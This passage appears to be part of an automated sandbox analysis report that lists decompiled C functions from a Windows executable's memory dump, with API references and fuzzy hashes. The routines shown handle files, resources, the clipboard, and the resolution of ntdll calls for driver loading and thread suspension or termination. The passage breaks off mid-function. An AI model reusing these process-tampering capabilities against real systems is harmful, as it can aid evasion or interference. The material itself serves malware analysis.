                                                                                                                                                                    • API String ID: 823142352-0
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                    			E00405338(WCHAR* _a4) {
                                                                                                                                                                    				void* _t3;
                                                                                                                                                                    
                                                                                                                                                                    				_t3 = CreateFileW(_a4, 0x80000000, 3, 0, 3, 0, 0); // executed
                                                                                                                                                                    				return _t3;
                                                                                                                                                                    			}





                                                                                                                                                                    APIs
                                                                                                                                                                    • CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,00403FF7,?,?,00000000,00403B9A,?), ref: 0040534A
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CreateFile
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 823142352-0
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                    			E0040DA82(struct HINSTANCE__* _a4, WCHAR* _a8) {
                                                                                                                                                                    
                                                                                                                                                                    				EnumResourceNamesW(_a4, _a8, E0040D9FC, 0); // executed
                                                                                                                                                                    				return 1;
                                                                                                                                                                    			}




                                                                                                                                                                    APIs
                                                                                                                                                                    • EnumResourceNamesW.KERNELBASE(?,?,0040D9FC,00000000), ref: 0040DA91
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: EnumNamesResource
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3334572018-0
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                    			E0040405E(void** __esi) {
                                                                                                                                                                    				void* _t1;
                                                                                                                                                                    				signed int* _t2;
                                                                                                                                                                    
                                                                                                                                                                    				_t2 = __esi;
                                                                                                                                                                    				_t1 =  *__esi;
                                                                                                                                                                    				if(_t1 != 0xffffffff) {
                                                                                                                                                                    					_t1 = FindCloseChangeNotification(_t1); // executed
                                                                                                                                                                    				}
                                                                                                                                                                    				 *_t2 =  *_t2 | 0xffffffff;
                                                                                                                                                                    				return _t1;
                                                                                                                                                                    			}






                                                                                                                                                                    APIs
                                                                                                                                                                    • FindCloseChangeNotification.KERNELBASE(00000000,00403FC6,?,0040BE7E), ref: 00404066
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ChangeCloseFindNotification
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2591292051-0
                                                                                                                                                                    • Opcode ID: bc5a44fb32040061edbda8d3543cb511c92e7b0a37bc3428954c49ae59e4d506
                                                                                                                                                                    • Instruction ID: 40547022017336ee125913f65e591b655fd6556432e54264b79cbfeb0dc3c2d4
                                                                                                                                                                    • Opcode Fuzzy Hash: bc5a44fb32040061edbda8d3543cb511c92e7b0a37bc3428954c49ae59e4d506
                                                                                                                                                                    • Instruction Fuzzy Hash: ECB09270500541CBE6345F78884980A7AA4AA813703B44B28A1F6F10F2D33888468A14
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                    			E004057D1(WCHAR* _a4) {
                                                                                                                                                                    				long _t4;
                                                                                                                                                                    
                                                                                                                                                                    				_t4 = GetFileAttributesW(_a4); // executed
                                                                                                                                                                    				return 0 | _t4 != 0xffffffff;
                                                                                                                                                                    			}





                                                                                                                                                                    APIs
                                                                                                                                                                    • GetFileAttributesW.KERNELBASE(?,004071DA,?,00407291,00000000,?,00000000,00000208,?), ref: 004057D5
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AttributesFile
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3188754299-0
                                                                                                                                                                    • Opcode ID: 8e4c376cf7c570f1656cc04afb23f0be4d71cb0539670ea516d7700e7cbaecd3
                                                                                                                                                                    • Instruction ID: f1cceac889999bb919f5bca999730fd8e3c757b1acafb66fb331f39110631968
                                                                                                                                                                    • Opcode Fuzzy Hash: 8e4c376cf7c570f1656cc04afb23f0be4d71cb0539670ea516d7700e7cbaecd3
                                                                                                                                                                    • Instruction Fuzzy Hash: FFB012B52100014BCB1807349D4508D35905F44631B31873CB037D0CF0E730CCA8BA00
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    C-Code - Quality: 90%
                                                                                                                                                                    			E004048DA(void* __ecx, void* __edx, intOrPtr* _a4, intOrPtr _a8, void** _a12) {
                                                                                                                                                                    				intOrPtr _v8;
                                                                                                                                                                    				intOrPtr _v12;
                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                    				void* __edi;
                                                                                                                                                                    				void* __esi;
                                                                                                                                                                    				intOrPtr _t20;
                                                                                                                                                                    				void* _t22;
                                                                                                                                                                    				intOrPtr _t25;
                                                                                                                                                                    				intOrPtr _t29;
                                                                                                                                                                    				intOrPtr _t31;
                                                                                                                                                                    				void* _t38;
                                                                                                                                                                    				void** _t40;
                                                                                                                                                                    				intOrPtr* _t47;
                                                                                                                                                                    
                                                                                                                                                                    				_t38 = __edx;
                                                                                                                                                                    				_t34 = __ecx;
                                                                                                                                                                    				_push(__ecx);
                                                                                                                                                                    				_push(__ecx);
                                                                                                                                                                    				_t44 = _a4;
                                                                                                                                                                    				_t40 = _a12;
                                                                                                                                                                    				_t31 = 0;
                                                                                                                                                                    				 *((intOrPtr*)(_a4 + 0x248)) = _t40;
                                                                                                                                                                    				_v8 = 0;
                                                                                                                                                                    				if( *((intOrPtr*)(_t40 + 0x428)) <= 0) {
                                                                                                                                                                    					L3:
                                                                                                                                                                    					_t20 = 0;
                                                                                                                                                                    					L4:
                                                                                                                                                                    					if(_t20 != 0) {
                                                                                                                                                                    						_t22 = E00404489(_t44 + 0x14, _t34, _t38, _t40, _t20); // executed
                                                                                                                                                                    						_t53 = _t22;
                                                                                                                                                                    						if(_t22 != 0) {
                                                                                                                                                                    							E00406729( *((intOrPtr*)( *((intOrPtr*)(_t40 + 0x418)) + 0xec)), _t44 + 4);
                                                                                                                                                                    							_t47 = _a4;
                                                                                                                                                                    							_t25 = E00404689(_a12, _t53,  *((intOrPtr*)(_t47 + 0x220)),  *((intOrPtr*)(_t44 + 4))); // executed
                                                                                                                                                                    							 *_t47 = _t25;
                                                                                                                                                                    							 *((intOrPtr*)(_t47 + 0x10)) = 1;
                                                                                                                                                                    							_v8 = 1;
                                                                                                                                                                    						}
                                                                                                                                                                    					}
                                                                                                                                                                    					return _v8;
                                                                                                                                                                    				} else {
                                                                                                                                                                    					goto L1;
                                                                                                                                                                    				}
                                                                                                                                                                    				while(1) {
                                                                                                                                                                    					L1:
                                                                                                                                                                    					_t29 = E00403F2B(_t31, _t40 + 0x41c);
                                                                                                                                                                    					_push(_a8);
                                                                                                                                                                    					_v12 = _t29;
                                                                                                                                                                    					L0040E03E();
                                                                                                                                                                    					_t34 = _t29;
                                                                                                                                                                    					if(_t29 == 0) {
                                                                                                                                                                    						break;
                                                                                                                                                                    					}
                                                                                                                                                                    					_t31 = _t31 + 1;
                                                                                                                                                                    					if(_t31 <  *((intOrPtr*)(_t40 + 0x428))) {
                                                                                                                                                                    						continue;
                                                                                                                                                                    					}
                                                                                                                                                                    					goto L3;
                                                                                                                                                                    				}
                                                                                                                                                                    				_t20 = _v12;
                                                                                                                                                                    				goto L4;
                                                                                                                                                                    			}

















                                                                                                                                                                    APIs
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: _wcsicmp
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2081463915-0
                                                                                                                                                                    • Opcode ID: 1a5aa7950c8524b605f159770a309709ad0bf62fba3d30ff973a537a5b72f3ad
                                                                                                                                                                    • Instruction ID: fdc747c80fe88fd67bd043bcbe7cc9eb3f50563aa05d6d30472a65970944665d
                                                                                                                                                                    • Opcode Fuzzy Hash: 1a5aa7950c8524b605f159770a309709ad0bf62fba3d30ff973a537a5b72f3ad
                                                                                                                                                                    • Instruction Fuzzy Hash: 9D115EF5600205AFC710DF79C88099AB7B8FF48354F10453EEA55E3240D734A9508BA8
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                    			E00403FDE(void** __eax, void* __eflags, WCHAR* _a4) {
                                                                                                                                                                    				void* __ecx;
                                                                                                                                                                    				void* __esi;
                                                                                                                                                                    				intOrPtr _t11;
                                                                                                                                                                    				void* _t14;
                                                                                                                                                                    				intOrPtr _t15;
                                                                                                                                                                    				intOrPtr* _t16;
                                                                                                                                                                    				intOrPtr* _t22;
                                                                                                                                                                    
                                                                                                                                                                    				_t22 = __eax;
                                                                                                                                                                    				 *(__eax + 0x414) =  *(__eax + 0x414) & 0x00000000;
                                                                                                                                                                    				E0040405E(__eax);
                                                                                                                                                                    				_t11 = E00405338(_a4);
                                                                                                                                                                    				 *_t22 = _t11;
                                                                                                                                                                    				if(_t11 == 0xffffffff) {
                                                                                                                                                                    					L7:
                                                                                                                                                                    					 *((intOrPtr*)(_t22 + 0x414)) = GetLastError();
                                                                                                                                                                    					L8:
                                                                                                                                                                    					return 0;
                                                                                                                                                                    				}
                                                                                                                                                                    				_t14 = E00405E43(_t22 + 4, _t11, _t22 + 4, 0x400); // executed
                                                                                                                                                                    				if(_t14 == 0) {
                                                                                                                                                                    					goto L7;
                                                                                                                                                                    				}
                                                                                                                                                                    				_t15 =  *((intOrPtr*)(_t22 + 0x418));
                                                                                                                                                                    				if( *((intOrPtr*)(_t15 + 4)) == 0x89abcdef) {
                                                                                                                                                                    					_t16 = _t15 + 0xec;
                                                                                                                                                                    					__eflags =  *_t16;
                                                                                                                                                                    					if(__eflags == 0) {
                                                                                                                                                                    						 *_t16 = 0x1000;
                                                                                                                                                                    					}
                                                                                                                                                                    					E00404541(__eflags, _t22); // executed
                                                                                                                                                                    					return 1;
                                                                                                                                                                    				}
                                                                                                                                                                    				 *((intOrPtr*)(_t22 + 0x414)) = 0xfff1;
                                                                                                                                                                    				goto L8;
                                                                                                                                                                    			}











                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 0040405E: FindCloseChangeNotification.KERNELBASE(00000000,00403FC6,?,0040BE7E), ref: 00404066
                                                                                                                                                                      • Part of subcall function 00405338: CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,00403FF7,?,?,00000000,00403B9A,?), ref: 0040534A
                                                                                                                                                                    • GetLastError.KERNEL32(?,00000000,00403B9A,?), ref: 0040404B
                                                                                                                                                                      • Part of subcall function 00405E43: ReadFile.KERNELBASE(?,?,?,00000000,00000000,?,?,0040400E,00000000,?,00000400,?,00000000,00403B9A,?), ref: 00405E5A
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: File$ChangeCloseCreateErrorFindLastNotificationRead
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 4176926985-0
                                                                                                                                                                    • Opcode ID: 28e05b3785312bd73728d28a7b4e7de4c452789e56a0673e54d11ff134628f3e
                                                                                                                                                                    • Instruction ID: 1be67c3d07cfbe594be31b534527c337e1243451ed86295bd1db7fefa69627cd
                                                                                                                                                                    • Opcode Fuzzy Hash: 28e05b3785312bd73728d28a7b4e7de4c452789e56a0673e54d11ff134628f3e
                                                                                                                                                                    • Instruction Fuzzy Hash: FD01D1F10016008AD320AB20C805B9376E8DF91315F10893FE3A6F72C1EB7C98818AA9
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                    			E00406355(signed int* __esi) {
                                                                                                                                                                    				void* _t5;
                                                                                                                                                                    				signed int* _t7;
                                                                                                                                                                    
                                                                                                                                                                    				_t7 = __esi;
                                                                                                                                                                    				_t5 =  *__esi;
                                                                                                                                                                    				if(_t5 != 0) {
                                                                                                                                                                    					free(_t5); // executed
                                                                                                                                                                    					 *__esi =  *__esi & 0x00000000;
                                                                                                                                                                    				}
                                                                                                                                                                    				_t7[1] = _t7[1] & 0x00000000;
                                                                                                                                                                    				_t7[2] = _t7[2] & 0x00000000;
                                                                                                                                                                    				return _t5;
                                                                                                                                                                    			}






                                                                                                                                                                    APIs
                                                                                                                                                                    • free.MSVCRT(00000000,004065BB,75144E00,?,00000000), ref: 0040635C
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: free
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1294909896-0
                                                                                                                                                                    • Opcode ID: 087bb4fc264830983fe200f1886ef8bdbde26bdfe1ad20cb23c944558e33102c
                                                                                                                                                                    • Instruction ID: 3b7e158b20e84301f479c6044b2c5b8c75456169b8cefd1b15b644340405c36b
                                                                                                                                                                    • Opcode Fuzzy Hash: 087bb4fc264830983fe200f1886ef8bdbde26bdfe1ad20cb23c944558e33102c
                                                                                                                                                                    • Instruction Fuzzy Hash: 8FC04C72910B019BE7349F26D449766B3E4BF1073BF618C2DA4D5914C1DBBCE494CA18
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                    			E00403F55(void** __esi) {
                                                                                                                                                                    				void* _t5;
                                                                                                                                                                    				signed int* _t7;
                                                                                                                                                                    
                                                                                                                                                                    				_t7 = __esi;
                                                                                                                                                                    				_t5 =  *__esi;
                                                                                                                                                                    				if(_t5 != 0) {
                                                                                                                                                                    					free(_t5); // executed
                                                                                                                                                                    				}
                                                                                                                                                                    				 *_t7 =  *_t7 & 0x00000000;
                                                                                                                                                                    				_t7[3] = _t7[3] & 0x00000000;
                                                                                                                                                                    				_t7[1] = _t7[1] & 0x00000000;
                                                                                                                                                                    				return _t5;
                                                                                                                                                                    			}






                                                                                                                                                                    APIs
                                                                                                                                                                    • free.MSVCRT(00000000,0040BC79,?,00000000,0040C0A1,/deleteregkey,/savelangfile,?,?,?,?,00000002,?,0040E23C,00000000), ref: 00403F5C
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: free
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1294909896-0
                                                                                                                                                                    • Opcode ID: ca8b33ba02bdd68b061cc876ecb80c5c4dc103e44f57bd864d81743fd2e6ef53
                                                                                                                                                                    • Instruction ID: 3143f4fb3421a8fd8d8aef00c743a9b8e7153b02c0e56cadf99ac6914a485b7f
                                                                                                                                                                    • Opcode Fuzzy Hash: ca8b33ba02bdd68b061cc876ecb80c5c4dc103e44f57bd864d81743fd2e6ef53
                                                                                                                                                                    • Instruction Fuzzy Hash: 48C00272910B019FE7309E26C405B66B7E8AF1073BF918C1D94D5914C1D7BCD4448A14
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Non-executed Functions

                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                    			E0040C41D() {
                                                                                                                                                                    				void* _t1;
                                                                                                                                                                    				struct HINSTANCE__* _t2;
                                                                                                                                                                    				_Unknown_base(*)()* _t14;
                                                                                                                                                                    
                                                                                                                                                                    				if( *0x4132c4 == 0) {
                                                                                                                                                                    					_t2 = GetModuleHandleW(L"ntdll.dll");
                                                                                                                                                                    					 *0x4132c4 = _t2;
                                                                                                                                                                    					 *0x413294 = GetProcAddress(_t2, "NtQuerySystemInformation");
                                                                                                                                                                    					 *0x413298 = GetProcAddress( *0x4132c4, "NtLoadDriver");
                                                                                                                                                                    					 *0x41329c = GetProcAddress( *0x4132c4, "NtUnloadDriver");
                                                                                                                                                                    					 *0x4132a0 = GetProcAddress( *0x4132c4, "NtOpenSymbolicLinkObject");
                                                                                                                                                                    					 *0x4132a4 = GetProcAddress( *0x4132c4, "NtQuerySymbolicLinkObject");
                                                                                                                                                                    					 *0x4132a8 = GetProcAddress( *0x4132c4, "NtQueryObject");
                                                                                                                                                                    					 *0x4132ac = GetProcAddress( *0x4132c4, "NtOpenThread");
                                                                                                                                                                    					 *0x4132b0 = GetProcAddress( *0x4132c4, "NtClose");
                                                                                                                                                                    					 *0x4132b4 = GetProcAddress( *0x4132c4, "NtQueryInformationThread");
                                                                                                                                                                    					 *0x4132b8 = GetProcAddress( *0x4132c4, "NtSuspendThread");
                                                                                                                                                                    					 *0x4132bc = GetProcAddress( *0x4132c4, "NtResumeThread");
                                                                                                                                                                    					_t14 = GetProcAddress( *0x4132c4, "NtTerminateThread");
                                                                                                                                                                    					 *0x4132c0 = _t14;
                                                                                                                                                                    					return _t14;
                                                                                                                                                                    				}
                                                                                                                                                                    				return _t1;
                                                                                                                                                                    			}







                                                                                                                                                                    APIs
                                                                                                                                                                    • GetModuleHandleW.KERNEL32(ntdll.dll,?,0040C596,?,?,00000000), ref: 0040C430
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 0040C447
                                                                                                                                                                    • GetProcAddress.KERNEL32(NtLoadDriver), ref: 0040C459
                                                                                                                                                                    • GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0040C46B
                                                                                                                                                                    • GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0040C47D
                                                                                                                                                                    • GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 0040C48F
                                                                                                                                                                    • GetProcAddress.KERNEL32(NtQueryObject), ref: 0040C4A1
                                                                                                                                                                    • GetProcAddress.KERNEL32(NtOpenThread), ref: 0040C4B3
                                                                                                                                                                    • GetProcAddress.KERNEL32(NtClose), ref: 0040C4C5
                                                                                                                                                                    • GetProcAddress.KERNEL32(NtQueryInformationThread), ref: 0040C4D7
                                                                                                                                                                    • GetProcAddress.KERNEL32(NtSuspendThread), ref: 0040C4E9
                                                                                                                                                                    • GetProcAddress.KERNEL32(NtResumeThread), ref: 0040C4FB
                                                                                                                                                                    • GetProcAddress.KERNEL32(NtTerminateThread), ref: 0040C50D
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AddressProc$HandleModule
                                                                                                                                                                    • String ID: NtClose$NtLoadDriver$NtOpenSymbolicLinkObject$NtOpenThread$NtQueryInformationThread$NtQueryObject$NtQuerySymbolicLinkObject$NtQuerySystemInformation$NtResumeThread$NtSuspendThread$NtTerminateThread$NtUnloadDriver$ntdll.dll
                                                                                                                                                                    • API String ID: 667068680-4280973841
                                                                                                                                                                    • Opcode ID: 0eddc1e60b10c18c4745ef63ef14c7ef42ad6bc27fe304210325578cd75792ce
                                                                                                                                                                    • Instruction ID: 58691313bf47f16c5c12281129ebfbb01f3831da172bf8a538c636a3e5316245
                                                                                                                                                                    • Opcode Fuzzy Hash: 0eddc1e60b10c18c4745ef63ef14c7ef42ad6bc27fe304210325578cd75792ce
                                                                                                                                                                    • Instruction Fuzzy Hash: 27119778D41325AECB12BF71AD09ACA7EB1E764B5671084F7A408722F0D6B942A0DF4C
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                    			E0040AE4D(signed int __eax, void* __ecx, void* __edx, void* __esi, void* __eflags) {
                                                                                                                                                                    				void* __edi;
                                                                                                                                                                    				int _t11;
                                                                                                                                                                    				void* _t13;
                                                                                                                                                                    				void* _t15;
                                                                                                                                                                    				void* _t17;
                                                                                                                                                                    
                                                                                                                                                                    				_t15 = __edx;
                                                                                                                                                                    				_t13 = __ecx;
                                                                                                                                                                    				_t16 = __esi + 0x6ac;
                                                                                                                                                                    				E0040637A(__eax | 0xffffffff, __esi + 0x6ac, 0x40f454);
                                                                                                                                                                    				 *((intOrPtr*)(__esi + 0x6bc)) = 0x4000;
                                                                                                                                                                    				E0040AE99(_t13, _t15, __esi,  *((intOrPtr*)(__esi + 0x69c)));
                                                                                                                                                                    				_t17 = E0040636E(_t16);
                                                                                                                                                                    				_t11 = OpenClipboard( *(__esi + 0x208));
                                                                                                                                                                    				if(_t11 != 0) {
                                                                                                                                                                    					return E004054F1(_t17);
                                                                                                                                                                    				}
                                                                                                                                                                    				return _t11;
                                                                                                                                                                    			}









                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 0040637A: wcslen.MSVCRT ref: 0040638D
                                                                                                                                                                      • Part of subcall function 0040637A: memcpy.MSVCRT ref: 004063AC
                                                                                                                                                                      • Part of subcall function 0040AE99: SendMessageW.USER32(?,0000100C,000000FF,00000002), ref: 0040AEEB
                                                                                                                                                                    • OpenClipboard.USER32(?), ref: 0040AE86
                                                                                                                                                                      • Part of subcall function 004054F1: EmptyClipboard.USER32(?,?,0040AE96,00000000), ref: 004054F9
                                                                                                                                                                      • Part of subcall function 004054F1: wcslen.MSVCRT ref: 00405506
                                                                                                                                                                      • Part of subcall function 004054F1: GlobalAlloc.KERNEL32(00002000,00000002,00000000,?,?,?,0040AE96,00000000), ref: 00405516
                                                                                                                                                                      • Part of subcall function 004054F1: GlobalLock.KERNEL32 ref: 00405523
                                                                                                                                                                      • Part of subcall function 004054F1: memcpy.MSVCRT ref: 0040552C
                                                                                                                                                                      • Part of subcall function 004054F1: GlobalUnlock.KERNEL32(00000000), ref: 00405535
                                                                                                                                                                      • Part of subcall function 004054F1: SetClipboardData.USER32 ref: 0040553E
                                                                                                                                                                      • Part of subcall function 004054F1: CloseClipboard.USER32(?,?,0040AE96,00000000), ref: 0040554E
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Clipboard$Global$memcpywcslen$AllocCloseDataEmptyLockMessageOpenSendUnlock
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2178300729-0
                                                                                                                                                                    • Opcode ID: 2bf5dca165b34132fb64bb1855b861156878277b56bd8399cb3bfe959ead56f4
                                                                                                                                                                    • Instruction ID: d2c7d0a254bb278864896b88801620e30a707c529b051fe324ebedfb26bf80ea
                                                                                                                                                                    • Opcode Fuzzy Hash: 2bf5dca165b34132fb64bb1855b861156878277b56bd8399cb3bfe959ead56f4
                                                                                                                                                                    • Instruction Fuzzy Hash: F0E0DFB1100B0056C6217736A801B9B76A26F80324B100B3EF8A6B11E2CB3960AA9A49
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    C-Code - Quality: 98%
                                                                                                                                                                    			E0040D12C(void* __ecx, intOrPtr* __esi, void* __eflags, signed int _a4, intOrPtr _a8, intOrPtr _a12, struct HDC__* _a16, long _a20, signed int _a24, intOrPtr _a28, signed int _a32, long _a36, intOrPtr _a40, struct tagPOINT _a44, intOrPtr _a48, intOrPtr _a52, intOrPtr _a56, struct tagPOINT _a60, intOrPtr _a64, intOrPtr _a68, short _a72, intOrPtr _a76, struct tagRECT _a80, intOrPtr _a84, intOrPtr _a88, intOrPtr _a92, long _a96, struct tagPOINT _a100, intOrPtr _a104, intOrPtr _a108, intOrPtr _a112, struct tagSIZE _a116, struct tagRECT _a124, intOrPtr _a128, intOrPtr _a136, char _a584) {
                                                                                                                                                                    				signed int _v0;
                                                                                                                                                                    				intOrPtr _v8;
                                                                                                                                                                    				intOrPtr _v12;
                                                                                                                                                                    				intOrPtr _v16;
                                                                                                                                                                    				intOrPtr _v24;
                                                                                                                                                                    				intOrPtr _v32;
                                                                                                                                                                    				signed int _v36;
                                                                                                                                                                    				intOrPtr _v52;
                                                                                                                                                                    				struct HWND__* _v56;
                                                                                                                                                                    				struct HWND__* _v60;
                                                                                                                                                                    				intOrPtr _v68;
                                                                                                                                                                    				intOrPtr _v72;
                                                                                                                                                                    				intOrPtr _v76;
                                                                                                                                                                    				struct HDC__* _t169;
                                                                                                                                                                    				struct HWND__* _t171;
                                                                                                                                                                    				intOrPtr _t220;
                                                                                                                                                                    				void* _t221;
                                                                                                                                                                    				intOrPtr _t232;
                                                                                                                                                                    				struct HWND__* _t234;
                                                                                                                                                                    				void* _t237;
                                                                                                                                                                    				intOrPtr* _t271;
                                                                                                                                                                    				signed int _t272;
                                                                                                                                                                    				signed int _t273;
                                                                                                                                                                    
                                                                                                                                                                    				_t271 = __esi;
